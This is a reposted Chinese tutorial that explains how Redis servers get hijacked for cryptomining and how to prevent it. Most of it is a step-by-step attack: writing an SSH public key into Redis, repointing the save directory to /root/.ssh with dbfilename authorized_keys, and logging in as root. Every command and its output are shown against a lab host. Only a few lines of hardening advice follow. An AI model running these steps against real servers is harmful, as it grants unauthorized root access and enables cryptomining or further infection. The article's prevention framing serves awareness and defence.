浅析Redis挖矿原理，看看如何预防（技巧分享）-Redis-PHP中文网

首页

数据库

Redis

浅析Redis挖矿原理，看看如何预防（技巧分享）

青灯夜游

Jan 11, 2022 pm 06:49 PM

redis挖矿预防

本篇文章带大家聊聊Redis挖矿原理，看看如何预防，分享一下防范的技巧，希望对大家有所帮助！

浅析Redis挖矿原理，看看如何预防（技巧分享）

笔者也曾经被挖矿病毒侵袭过，灰常难受，但是其实你只要了解入侵的手段就非常好防范了，今天我们就演示一下如果通过Redis进行提权获取远程服务器的Root用户。【相关推荐：Redis视频教程】

1、首先我们需要一些先决条件

条件一：你首先要有一个Redis，并且我们要知道他的端口【默认6379】；
条件二：Redis的密码不能过于复杂，或者没有密码；
条件三：启动Redis的用户最好是Root用户，这样破坏性更大；

2、开始搞事情

2.1 创建一对秘钥

通过ssh-keygen生成一对，当然可以使用已经有的都没有问题。

root@kali:/usr/local/src# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

接下来通过公钥生成攻击键值

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt

内容如下

root@kali:/tmp/rediskey# cat foo.txt 

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

这里前后增加两个换行符是为了防止数据连接在一起造成失效问题。

2.2 配置Key到Redis中

操作如下：

root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK

登录Redis进行检查，是否已经写入进Redis中。

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"

2.3 通过Redis保存机制替换系统文件

且看如下操作

192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit

这个时候，我们登录远程主机看下效果。

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host &#39;192.168.243.129 (192.168.243.129)&#39; can&#39;t be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added &#39;192.168.243.129&#39; (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~# w

OK，到这里我们已经提权成功了，那我们看下导出文件到底是什么呢？其实就是Redis的保存文件形式罢了，有兴趣可以自己打开看看，这里不再展示。

3、如何预防

这个漏洞威力还是挺大的，我们现在只是拿到主机权限一个而已，加入放到定时任务执行一些脚本然后在批量感染呢？

防范的技巧如下：

Redis不要监听在危险IP上，如果有请加防火墙控制；
Redis一定要增加密码限制，且不能是弱口令；
Redis尽量不要用Root用户身份来启动。

做到如上三点防范Redis挖矿，没问题的

更多编程相关知识，请访问：编程入门！！

以上是浅析Redis挖矿原理，看看如何预防（技巧分享）的详细内容。更多信息请关注PHP中文网其他相关文章！

声明

本文转载于：博客园。如有侵权，请联系admin@php.cn删除

Redis是SQL还是NOSQL数据库？答案解释了Apr 18, 2025 am 12:11 AM

RedisisclassifiedasaNoSQLdatabasebecauseitusesakey-valuedatamodelinsteadofthetraditionalrelationaldatabasemodel.Itoffersspeedandflexibility,makingitidealforreal-timeapplicationsandcaching,butitmaynotbesuitableforscenariosrequiringstrictdataintegrityo

REDIS：提高应用程序性能和可扩展性Apr 17, 2025 am 12:16 AM

Redis通过缓存数据、实现分布式锁和数据持久化来提升应用性能和可扩展性。1）缓存数据：使用Redis缓存频繁访问的数据，提高数据访问速度。2）分布式锁：利用Redis实现分布式锁，确保在分布式环境中操作的安全性。3）数据持久化：通过RDB和AOF机制保证数据安全性，防止数据丢失。

REDIS：探索其数据模型和结构Apr 16, 2025 am 12:09 AM

Redis的数据模型和结构包括五种主要类型：1.字符串（String）：用于存储文本或二进制数据，支持原子操作。2.列表（List）：有序元素集合，适合队列和堆栈。3.集合（Set）：无序唯一元素集合，支持集合运算。4.有序集合（SortedSet）：带分数的唯一元素集合，适用于排行榜。5.哈希表（Hash）：键值对集合，适合存储对象。

REDIS：对其数据库方法进行分类Apr 15, 2025 am 12:06 AM

Redis的数据库方法包括内存数据库和键值存储。1）Redis将数据存储在内存中，读写速度快。2）它使用键值对存储数据，支持复杂数据结构，如列表、集合、哈希表和有序集合，适用于缓存和NoSQL数据库。

为什么要使用redis？利益和优势Apr 14, 2025 am 12:07 AM

Redis是一个强大的数据库解决方案，因为它提供了极速性能、丰富的数据结构、高可用性和扩展性、持久化能力以及广泛的生态系统支持。1）极速性能：Redis的数据存储在内存中，读写速度极快，适合高并发和低延迟应用。2）丰富的数据结构：支持多种数据类型，如列表、集合等，适用于多种场景。3）高可用性和扩展性：支持主从复制和集群模式，实现高可用性和水平扩展。4）持久化和数据安全：通过RDB和AOF两种方式实现数据持久化，确保数据的完整性和可靠性。5）广泛的生态系统和社区支持：拥有庞大的生态系统和活跃社区，